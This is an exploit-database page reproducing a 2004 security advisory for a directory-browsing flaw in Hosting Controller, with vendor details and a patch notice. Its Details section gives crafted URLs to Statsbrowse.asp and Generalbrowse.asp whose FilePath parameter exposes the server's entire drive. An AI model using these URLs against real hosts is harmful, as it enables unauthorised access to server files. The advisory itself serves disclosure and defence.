header-logo
Suggest Exploit
vendor:
Hosting Controller
by:
(/) Mouse
7.5
CVSS
HIGH
Directory Browsing
548
CWE
Product Name: Hosting Controller
Affected Version From: All versions
Affected Version To: Not specified
Patch Exists: YES
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows
2004

Vulnerability in Hosting Controller allows directory browsing

The Hosting Controller software has a security flaw that allows attackers to browse any file and any directory on the server. The vulnerability exists in the admin/mail/Statsbrowse.asp and admin/iis/Generalbrowse.asp files. By manipulating the URL, an attacker can view the contents of the server's hard disk.

Mitigation:

The vendor has released a patch for this vulnerability. Users are advised to update their software to the latest version.
Source

Exploit-DB raw data:

Advisory Information
-------------------------

Software Package   	: Hosting Controller
Vendor Homepage    	: http://www.hostingcontroller.com
Platforms          		: Windows based servers
Vulnerable Versions	: All version ( Tested on: v.6.1 Hotfix 1.4 )
Vendor Contacted  	: 12/5/2004
Release Date:      	: 12/7/2004

Summary
------------

Hosting Controller is a complete array of Web hosting automation tools
for the Windows Server family platform.
Hosting Controller has a security flaw which allows attackers to browse
any file and any directory on that server.

Details
---------

Vulnerability - Directories Browsing files on the system.
Foolish vulnerability:

1)This vulnerability is on the admin/mail/Statsbrowse.asp and attackers
can view the Harddisk by using this file.
Login with your account
http://www.yoursite.com/admin
Now you see
http://www.yoursite.com/admin/main.asp
Change this url to
http://www.yoursite.com/admin/mail/Statsbrowse.asp?FilePath=c:\&Opt=3&level=1&upflag=0

2)This vulnerability is on the admin/iis/Generalbrowse.asp and attackers
can view the Harddisk by using this file.
Login with your account
http://www.yoursite.com/admin
Now you see
http://www.yoursite.com/admin/main.asp
Change this url to <br/>
http://www.yoursite.com/admin/iis/Generalbrowse.asp?FilePath=C:\

Solution
----------

The vender was notified, they have released a patch.
Update Your software

Credits
---------

Discovered on May 6, 2004 by (\/) Mouse
Mouse@Shabgard.org
Additional Research: s7az2mm and bl2k
http://Shabgard.org

References
-------------

http://isun.Shabgard.org/hc.html
http://isun.Shabgard.org/hc.txt

# milw0rm.com [2004-12-05]

Navigation

Suggest Exploit

Services By CQR